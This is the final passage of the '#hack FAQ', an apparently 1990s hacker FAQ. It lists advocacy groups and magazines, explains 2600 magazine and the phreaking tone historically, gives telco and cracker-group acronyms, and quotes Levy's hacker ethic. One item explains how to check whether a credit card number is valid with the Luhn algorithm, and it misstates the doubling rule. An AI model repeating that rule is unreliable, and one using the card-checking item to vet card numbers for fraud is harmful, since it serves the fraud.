LETTERS AND ARTICLE SUBMISSION ADDRESS: GUIDELINES@WIRED.COM
|
|||
|
OR: WIRED
|
|||
|
544 SECOND STREET
|
|||
|
SAN FRANCISCO, CA 94107-1427
|
|||
|
|
|||
|
SUBSCRIPTIONS: $39/YR (US) $64/YR (CANADA/MEXICO) $79/YR (OVERSEAS)
|
|||
|
|
|||
|
|
|||
|
NUTS & VOLTS
|
|||
|
~~~~~~~~~~~~
|
|||
|
430 PRINCELAND COURT
|
|||
|
CORONA, CA 91719
|
|||
|
(800)783-4624
|
|||
|
|
|||
|
|
|||
|
11. WHAT ARE SOME ORGANIZATIONS OF INTEREST TO HACKERS?
|
|||
|
|
|||
|
COMPUTER PROFESSIONALS FOR SOCIAL RESPONSIBILITY (CPSR)
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
CPSR EMPOWERS COMPUTER PROFESSIONALS AND COMPUTER USERS TO ADVOCATE
|
|||
|
|
|||
|
#hack FAQ (86/4003)
|
|||
|
FOR THE RESPONSIBLE USE OF INFORMATION TECHNOLOGY AND EMPOWERS ALL WHO
|
|||
|
USE COMPUTER TECHNOLOGY TO PARTICIPATE IN THE PUBLIC DEBATE. AS
|
|||
|
TECHNICAL EXPERTS, CPSR MEMBERS PROVIDE THE PUBLIC AND POLICYMAKERS
|
|||
|
WITH REALISTIC ASSESSMENTS OF THE POWER, PROMISE, AND LIMITATIONS OF
|
|||
|
COMPUTER TECHNOLOGY. AS AN ORGANIZATION OF CONCERNED CITIZENS, CPSR
|
|||
|
DIRECTS PUBLIC ATTENTION TO CRITICAL CHOICES CONCERNING THE
|
|||
|
APPLICATIONS OF COMPUTING AND HOW THOSE CHOICES AFFECT SOCIETY.
|
|||
|
|
|||
|
BY MATCHING UNIMPEACHABLE TECHNICAL INFORMATION WITH POLICY
|
|||
|
DEVELOPMENT SAVVY, CPSR USES MINIMUM DOLLARS TO HAVE MAXIMUM IMPACT
|
|||
|
AND ENCOURAGES BROAD PUBLIC PARTICIPATION IN THE SHAPING OF TECHNOLOGY
|
|||
|
POLICY.
|
|||
|
|
|||
|
EVERY PROJECT WE UNDERTAKE IS BASED ON FIVE PRINCIPLES:
|
|||
|
|
|||
|
* WE FOSTER AND SUPPORT PUBLIC DISCUSSION OF AND PUBLIC
|
|||
|
RESPONSIBILITY FOR DECISIONS INVOLVING THE USE OF COMPUTERS IN
|
|||
|
SYSTEMS CRITICAL TO SOCIETY.
|
|||
|
|
|||
|
* WE WORK TO DISPEL POPULAR MYTHS ABOUT THE INFALLIBILITY OF
|
|||
|
TECHNOLOGICAL SYSTEMS.
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (86/4025)
|
|||
|
* WE CHALLENGE THE ASSUMPTION THAT TECHNOLOGY ALONE CAN SOLVE
|
|||
|
POLITICAL AND SOCIAL PROBLEMS.
|
|||
|
|
|||
|
* WE CRITICALLY EXAMINE SOCIAL AND TECHNICAL ISSUES WITHIN THE
|
|||
|
COMPUTER PROFESSION, NATIONALLY AND INTERNATIONALLY.
|
|||
|
|
|||
|
* WE ENCOURAGE THE USE OF COMPUTER TECHNOLOGY TO IMPROVE THE QUALITY
|
|||
|
OF LIFE.
|
|||
|
|
|||
|
CPSR MEMBERSHIP CATEGORIES
|
|||
|
75 REGULAR MEMBER
|
|||
|
50 BASIC MEMBER
|
|||
|
200 SUPPORTING MEMBER
|
|||
|
500 SPONSORING MEMBER
|
|||
|
1000 LIFETIME MEMBER
|
|||
|
20 STUDENT/LOW INCOME MEMBER
|
|||
|
50 FOREIGN SUBSCRIBER
|
|||
|
50 LIBRARY/INSTITUTIONAL SUBSCRIBER
|
|||
|
|
|||
|
CPSR NATIONAL OFFICE
|
|||
|
P.O. BOX 717
|
|||
|
PALO ALTO, CA 94301
|
|||
|
|
|||
|
#hack FAQ (86/4047)
|
|||
|
415-322-3778
|
|||
|
415-322-3798 (FAX)
|
|||
|
E-MAIL: CPSR@CSLI.STANFORD.EDU
|
|||
|
|
|||
|
|
|||
|
ELECTRONIC FRONTIER FOUNDATION (EFF)
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
THE ELECTRONIC FRONTIER FOUNDATION (EFF) IS DEDICATED TO THE PURSUIT
|
|||
|
OF POLICIES AND ACTIVITIES THAT WILL ADVANCE FREEDOM AND OPENNESS IN
|
|||
|
COMPUTER-BASED COMMUNICATIONS. IT IS A MEMBER-SUPPORTED, NONPROFIT
|
|||
|
GROUP THAT GREW FROM THE CONVICTION THAT A NEW PUBLIC INTEREST
|
|||
|
ORGANIZATION WAS NEEDED IN THE INFORMATION AGE; THAT THIS ORGANIZATION
|
|||
|
WOULD ENHANCE AND PROTECT THE DEMOCRATIC POTENTIAL OF NEW COMPUTER
|
|||
|
COMMUNICATIONS TECHNOLOGY. FROM THE BEGINNING, THE EFF DETERMINED TO
|
|||
|
BECOME AN ORGANIZATION THAT WOULD COMBINE TECHNICAL, LEGAL, AND PUBLIC
|
|||
|
POLICY EXPERTISE, AND WOULD APPLY THESE SKILLS TO THE MYRIAD ISSUES
|
|||
|
AND CONCERNS THAT ARISE WHENEVER A NEW COMMUNICATIONS MEDIUM IS BORN.
|
|||
|
|
|||
|
MEMBERSHIPS ARE $20.00 PER YEAR FOR STUDENTS, $40.00 PER YEAR FOR
|
|||
|
REGULAR MEMBERS, AND $100.00 PER YEAR FOR ORGANIZATIONS.
|
|||
|
|
|||
|
THE ELECTRONIC FRONTIER FOUNDATION, INC.
|
|||
|
|
|||
|
#hack FAQ (86/4069)
|
|||
|
666 PENNSYLVANIA AVENUE S.E., SUITE 303
|
|||
|
WASHINGTON, D.C. 20003
|
|||
|
+1 202 544 9237
|
|||
|
+1 202 547 5481 FAX
|
|||
|
INTERNET: EFF@EFF.ORG
|
|||
|
|
|||
|
|
|||
|
FREE SOFTWARE FOUNDATION (FSF)
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
|
|||
|
GNU
|
|||
|
~~~
|
|||
|
|
|||
|
|
|||
|
THE LEAGUE FOR PROGRAMMING FREEDOM (LPF)
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
THE LEAGUE FOR PROGRAMMING FREEDOM IS AN ORGANIZATION OF PEOPLE WHO
|
|||
|
OPPOSE THE ATTEMPT TO MONOPOLIZE COMMON USER INTERFACES THROUGH "LOOK
|
|||
|
AND FEEL" COPYRIGHT LAWSUITS. SOME OF US ARE PROGRAMMERS, WHO WORRY
|
|||
|
THAT SUCH MONOPOLIES WILL OBSTRUCT OUR WORK. SOME OF US ARE USERS,
|
|||
|
WHO WANT NEW COMPUTER SYSTEMS TO BE COMPATIBLE WITH THE INTERFACES WE
|
|||
|
|
|||
|
#hack FAQ (86/4091)
|
|||
|
KNOW. SOME ARE FOUNDERS OF HARDWARE OR SOFTWARE COMPANIES, SUCH AS
|
|||
|
RICHARD P. GABRIEL. SOME OF US ARE PROFESSORS OR RESEARCHERS,
|
|||
|
INCLUDING JOHN MCCARTHY, MARVIN MINSKY, GUY L. STEELE, JR., ROBERT S.
|
|||
|
BOYER AND PATRICK WINSTON.
|
|||
|
|
|||
|
"LOOK AND FEEL" LAWSUITS AIM TO CREATE A NEW CLASS OF GOVERNMENT-
|
|||
|
ENFORCED MONOPOLIES BROADER IN SCOPE THAN EVER BEFORE. SUCH A SYSTEM
|
|||
|
OF USER-INTERFACE COPYRIGHT WOULD IMPOSE GRATUITOUS INCOMPATIBILITY,
|
|||
|
REDUCE COMPETITION, AND STIFLE INNOVATION.
|
|||
|
|
|||
|
WE IN THE LEAGUE HOPE TO PREVENT THESE PROBLEMS BY PREVENTING
|
|||
|
USER-INTERFACE COPYRIGHT. THE LEAGUE IS NOT OPPOSED TO COPYRIGHT LAW
|
|||
|
AS IT WAS UNDERSTOOD UNTIL 1986 -- COPYRIGHT ON PARTICULAR PROGRAMS.
|
|||
|
OUR AIM IS TO STOP CHANGES IN THE COPYRIGHT SYSTEM WHICH WOULD TAKE
|
|||
|
AWAY PROGRAMMERS' TRADITIONAL FREEDOM TO WRITE NEW PROGRAMS COMPATIBLE
|
|||
|
WITH EXISTING PROGRAMS AND PRACTICES.
|
|||
|
|
|||
|
ANNUAL DUES FOR INDIVIDUAL MEMBERS ARE $42 FOR EMPLOYED PROFESSIONALS,
|
|||
|
$10.50 FOR STUDENTS, AND $21 FOR OTHERS. WE APPRECIATE ACTIVISTS, BUT
|
|||
|
MEMBERS WHO CANNOT CONTRIBUTE THEIR TIME ARE ALSO WELCOME.
|
|||
|
|
|||
|
TO CONTACT THE LEAGUE, PHONE (617) 243-4091, SEND INTERNET MAIL TO THE
|
|||
|
|
|||
|
#hack FAQ (86/4113)
|
|||
|
ADDRESS LEAGUE@PREP.AI.MIT.EDU, OR WRITE TO:
|
|||
|
|
|||
|
LEAGUE FOR PROGRAMMING FREEDOM
|
|||
|
1 KENDALL SQUARE #143
|
|||
|
P.O. BOX 9171
|
|||
|
CAMBRIDGE, MA 02139 USA
|
|||
|
|
|||
|
|
|||
|
SOTMESC
|
|||
|
~~~~~~~
|
|||
|
FOUNDED IN 1989, SOTMESC IS DEDICATED TO PRESERVING THE INTEGRITY AND
|
|||
|
COHESION OF THE COMPUTING SOCIETY. BY PROMOTING COMPUTER EDUCATION,
|
|||
|
LIBERTIES AND EFFICIENCY, WE BELIEVE WE CAN SECURE FREEDOMS FOR ALL
|
|||
|
COMPUTER USERS WHILE RETAINING PRIVACY.
|
|||
|
|
|||
|
SOTMESC MAINTAINS THE CSP INTERNET MAILING LIST, THE SOTMESC
|
|||
|
SCHOLARSHIP FUND, AND THE SOTMESC NEWSLETTER.
|
|||
|
|
|||
|
THE SOTMESC IS FINANCED PARTLY BY MEMBERSHIP FEES, AND DONATIONS, BUT
|
|||
|
MOSTLY BY SELLING HACKING, CRACKING, PHREAKING, ELECTRONICS, INTERNET,
|
|||
|
AND VIRUS INFORMATION AND PROGRAMS ON DISK AND BOUND PAPER MEDIA.
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (86/4135)
|
|||
|
SOTMESC MEMBERSHIPS ARE $20 TO STUDENTS AND $40 TO REGULAR MEMBERS.
|
|||
|
|
|||
|
SOTMESC
|
|||
|
P.O. BOX 573
|
|||
|
LONG BEACH, MS 39560
|
|||
|
|
|||
|
|
|||
|
12. WHERE CAN I PURCHASE A MAGNETIC STRIPE ENCODER/DECODER?
|
|||
|
|
|||
|
CPU ADVANCE
|
|||
|
PO BOX 2434
|
|||
|
HARWOOD STATION
|
|||
|
LITTLETON, MA 01460
|
|||
|
(508)624-4819 (FAX)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SECTION D: 2600
|
|||
|
~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
01. WHAT IS ALT.2600?
|
|||
|
|
|||
|
#hack FAQ (87/4158)
|
|||
|
ALT.2600 IS A USENET NEWSGROUP FOR DISCUSSION OF MATERIAL RELATING TO
|
|||
|
2600 MAGAZINE, THE HACKER QUARTERLY. IT IS NOT FOR THE ATARI 2600
|
|||
|
GAME MACHINE. LEN@NETSYS.COM CREATED THE GROUP ON EMMANUEL
|
|||
|
GOLDSTEIN'S RECOMMENDATION. EMMANUEL IS THE EDITOR/PUBLISHER OF 2600
|
|||
|
MAGAZINE. FOLLOWING THE BARRAGE OF POSTINGS ABOUT THE ATARI MACHINE TO
|
|||
|
ALT.2600, AN ALT.ATARI.2600 WAS CREATED TO DIVERT ALL OF THE ATARI
|
|||
|
TRAFFIC FROM ALT.2600. ATARI 2600 PEOPLE ARE ADVISED TO HIE OVER TO
|
|||
|
REC.GAMES.VIDEO.CLASSIC.
|
|||
|
|
|||
|
|
|||
|
02. WHAT DOES "2600" MEAN?
|
|||
|
|
|||
|
|
|||
|
2600HZ WAS A TONE THAT WAS USED BY EARLY PHONE PHREAKS (OR
|
|||
|
PHREAKERS) IN THE 80'S, AND SOME CURRENTLY. IF THE TONE WAS SENT DOWN THE
|
|||
|
LINE AT THE PROPER TIME, ONE COULD GET AWAY WITH ALL SORTS OF FUN STUFF.
|
|||
|
|
|||
|
A NOTE FROM EMMANUEL GOLDSTEIN:
|
|||
|
|
|||
|
|
|||
|
"THE ATARI 2600 HAS NOTHING TO DO WITH BLUE BOXES OR TELEPHONES
|
|||
|
OR THE 2600 HERTZ TONE. THE 2600 HERTZ TONE WAS SIMPLY THE FIRST
|
|||
|
|
|||
|
#hack FAQ (87/4180)
|
|||
|
STEP TOWARDS EXPLORING THE NETWORK. IF YOU WERE SUCCESSFUL AT
|
|||
|
GETTING A TOLL CALL TO DROP, THEN BILLING WOULD STOP AT THAT
|
|||
|
POINT BUT THERE WOULD BE BILLING FOR THE NUMBER ALREADY DIALED
|
|||
|
UP UNTIL THE POINT OF SEIZURE. 800 NUMBERS AND LONG DISTANCE
|
|||
|
INFORMATION WERE BOTH FREE IN THE PAST AND RECORDS OF WHO CALLED
|
|||
|
WHAT WERE EITHER NON-EXISTENT OR VERY OBSCURE WITH REGARDS TO
|
|||
|
THESE NUMBERS. THIS, NATURALLY, MADE THEM MORE POPULAR THAN
|
|||
|
NUMBERS THAT SHOWED UP ON A BILL, EVEN IF IT WAS ONLY FOR
|
|||
|
A MINUTE. TODAY, MANY 800 NUMBERS GO OVERSEAS, WHICH PROVIDES
|
|||
|
A QUICK AND FREE WAY INTO ANOTHER COUNTRY'S PHONE SYSTEM
|
|||
|
WHICH MAY BE MORE OPEN FOR EXPLORATION."
|
|||
|
|
|||
|
|
|||
|
03. ARE THERE ON-LINE VERSIONS OF 2600 AVAILABLE?
|
|||
|
|
|||
|
|
|||
|
NO.
|
|||
|
|
|||
|
|
|||
|
04. I CAN'T FIND 2600 AT ANY BOOKSTORES. WHAT CAN I DO?
|
|||
|
|
|||
|
SUBSCRIBE. OR, LET 2600 KNOW VIA THE SUBSCRIPTION ADDRESS THAT YOU
|
|||
|
|
|||
|
#hack FAQ (87/4202)
|
|||
|
THINK 2600 SHOULD BE IN THE BOOKSTORE. BE SURE TO INCLUDE THE
|
|||
|
BOOKSTORES NAME AND ADDRESS.
|
|||
|
|
|||
|
|
|||
|
05. WHY DOES 2600 COST MORE TO SUBSCRIBE TO THAN TO BUY AT A NEWSSTAND?
|
|||
|
|
|||
|
A NOTE FROM EMMANUEL GOLDSTEIN:
|
|||
|
|
|||
|
WE'VE BEEN SELLING 2600 AT THE SAME NEWSSTAND PRICE ($4) SINCE 1988
|
|||
|
AND WE HOPE TO KEEP IT AT THAT PRICE FOR AS LONG AS WE CAN GET AWAY
|
|||
|
WITH IT. AT THE SAME TIME, $21 IS ABOUT THE RIGHT PRICE TO COVER
|
|||
|
SUBSCRIBER COSTS, INCLUDING POSTAGE AND RECORD KEEPING, ETC. PEOPLE
|
|||
|
WHO SUBSCRIBE DON'T HAVE TO WORRY ABOUT FINDING AN ISSUE SOMEPLACE,
|
|||
|
THEY TEND TO GET ISSUES SEVERAL WEEKS BEFORE THE NEWSSTANDS GET
|
|||
|
THEM, AND THEY CAN TAKE OUT FREE ADS IN THE 2600 MARKETPLACE.
|
|||
|
|
|||
|
THIS IS NOT UNCOMMON IN THE PUBLISHING INDUSTRY. THE NY TIMES, FOR
|
|||
|
EXAMPLE, COSTS $156.50 AT THE NEWSSTANDS, AND $234.75 DELIVERED TO YOUR
|
|||
|
DOOR.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (88/4225)
|
|||
|
SECTION E: MISCELLANEOUS
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
01. WHAT DOES XXX STAND FOR?
|
|||
|
|
|||
|
TLA THREE LETTER ACRONYM
|
|||
|
|
|||
|
ACL ACCESS CONTROL LIST
|
|||
|
PIN PERSONAL IDENTIFICATION NUMBER
|
|||
|
TCB TRUSTED COMPUTING BASE
|
|||
|
|
|||
|
ALRU AUTOMATIC LINE RECORD UPDATE
|
|||
|
AN ASSOCIATED NUMBER
|
|||
|
ARSB AUTOMATED REPAIR SERVICE BUREAU
|
|||
|
ATH ABBREVIATED TROUBLE HISTORY
|
|||
|
BOC BELL OPERATING COMPANY
|
|||
|
BOR BASIC OUTPUT REPORT
|
|||
|
CA CABLE
|
|||
|
COE CENTRAL OFFICE EQUIPMENT
|
|||
|
CMC CONSTRUCTION MAINTENANCE CENTER
|
|||
|
CNID CALLING NUMBER IDENTIFICATION
|
|||
|
CO CENTRAL OFFICE
|
|||
|
|
|||
|
#hack FAQ (88/4247)
|
|||
|
COCOT CUSTOMER OWNED COIN OPERATED TELEPHONE
|
|||
|
CRSAB CENTRALIZED REPAIR SERVICE ANSWERING BUREAU
|
|||
|
DDD DIRECT DISTANCE DIALING
|
|||
|
ECC ENTER CABLE CHANGE
|
|||
|
LD LONG DISTANCE
|
|||
|
LMOS LOOP MAINTENANCE OPERATIONS SYSTEM
|
|||
|
MLT MECHANIZED LOOP TESTING
|
|||
|
NPA NUMBERING PLAN AREA
|
|||
|
POTS PLAIN OLD TELEPHONE SERVICE
|
|||
|
RBOC REGIONAL BELL OPERATING COMPANY
|
|||
|
RSB REPAIR SERVICE BUREAU
|
|||
|
SS SPECIAL SERVICE
|
|||
|
TAS TELEPHONE ANSWERING SERVICE
|
|||
|
TH TROUBLE HISTORY
|
|||
|
TREAT TROUBLE REPORT EVALUATION AND ANALYSIS TOOL
|
|||
|
|
|||
|
LOD LEGION OF DOOM
|
|||
|
HFC HELL FIRE CLUB
|
|||
|
TNO THE NEW ORDER
|
|||
|
|
|||
|
ACID ANSI CREATORS IN DEMAND
|
|||
|
CCI CYBERCRIME INTERNATIONAL
|
|||
|
|
|||
|
#hack FAQ (88/4269)
|
|||
|
FLT FAIRLIGHT
|
|||
|
ICE INSANE CREATORS ENTERPRISE
|
|||
|
INC INTERNATIONAL NETWORK OF CRACKERS
|
|||
|
NTA THE NOCTURNAL TRADING ALLIANCE
|
|||
|
PDX PARADOX
|
|||
|
PE PUBLIC ENEMY
|
|||
|
PSY PSYCHOSE
|
|||
|
QTX QUARTEX
|
|||
|
RZR RAZOR (1911)
|
|||
|
S!P SUPR!SE PRODUCTIONS
|
|||
|
TDT THE DREAM TEAM
|
|||
|
THG THE HUMBLE GUYS
|
|||
|
THP THE HILL PEOPLE
|
|||
|
TRSI TRISTAR RED SECTOR INC.
|
|||
|
|
|||
|
|
|||
|
02. HOW DO I DETERMINE IF I HAVE A VALID CREDIT CARD NUMBER?
|
|||
|
|
|||
|
CREDIT CARDS US THE LUHN CHECK DIGIT ALGORITHM. THE MAIN PURPOSE OF
|
|||
|
THIS ALGORITHM IS TO CATCH DATA ENTRY ERRORS, BUT IT DOES DOUBLE DUTY
|
|||
|
HERE AS A WEAK SECURITY TOOL.
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (88/4291)
|
|||
|
FOR A CARD WITH AN EVEN NUMBER OF DIGITS, DOUBLE EVERY ODD DIGIT AND
|
|||
|
SUBTRACT 9 IF THE PRODUCT IS GREATER THAN 10. ADD UP ALL THE EVEN
|
|||
|
DIGITS AS WELL AS THE DOUBLED-ODD DIGITS, AND THE RESULT MUST BE A
|
|||
|
MULTIPLE OF 10 OR IT'S NOT A VALID CARD. IF THE CARD HAS AN ODD
|
|||
|
NUMBER OF DIGITS, PERFORM THE SAME ADDITION DOUBLING THE EVEN DIGITS
|
|||
|
INSTEAD.
|
|||
|
|
|||
|
|
|||
|
03. WHERE CAN I GET A COPY OF THE #HACK FAQ?
|
|||
|
|
|||
|
FIND IT ON FTP AT:
|
|||
|
RAHUL.NET /PUB/LPS
|
|||
|
|
|||
|
FIND IT ON WORLD WIDE WEB AT:
|
|||
|
HTTP://DFW.NET/~ALEPH1
|
|||
|
HTTP://WWW.ENGIN.UMICH.EDU/~JGOTTS/UNDERGROUND.HTML
|
|||
|
HTTP://WWW.PHANTOM.COM/~KING
|
|||
|
|
|||
|
FIND IT WITH FINGER AT:
|
|||
|
WILL@GNU.AI.MIT.EDU
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (88/4313)
|
|||
|
04. WHAT ARE THE ETHICS OF HACKING?
|
|||
|
|
|||
|
THE FAQ ANSWER IS EXCERPTED FROM: HACKERS: HEROES OF THE COMPUTER REVOLUTION
|
|||
|
BY STEVEN LEVY
|
|||
|
|
|||
|
ACCESS TO COMPUTERS -- AND ANYTHING WHICH MIGHT TEACH YOU SOMETHING
|
|||
|
ABOUT THE WAY THE WORLD WORKS -- SHOULD BE UNLIMITED AND TOTAL.
|
|||
|
ALWAYS YIELD TO THE HANDS-ON IMPERATIVE.
|
|||
|
|
|||
|
ALL INFORMATION SHOULD BE FREE.
|
|||
|
|
|||
|
MISTRUST AUTHORITY. PROMOTE DECENTRALIZATION.
|
|||
|
|
|||
|
HACKERS SHOULD BE JUDGED BY THEIR HACKING, NOT BOGUS CRITERIA SUCH AS
|
|||
|
DEGREES, AGE, RACE, OR POSITION.
|
|||
|
|
|||
|
YOU CAN CREATE ART AND BEAUTY ON A COMPUTER.
|
|||
|
|
|||
|
COMPUTERS CAN CHANGE YOUR LIFE FOR THE BETTER.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (89/4336)
|
|||
|
EOT
|
|||
|
|
|||
|
|
|||
|
___________________________________
|
|||
|
[Home[1]] [Main[2]] [Prev[3]] [Next[4]]
|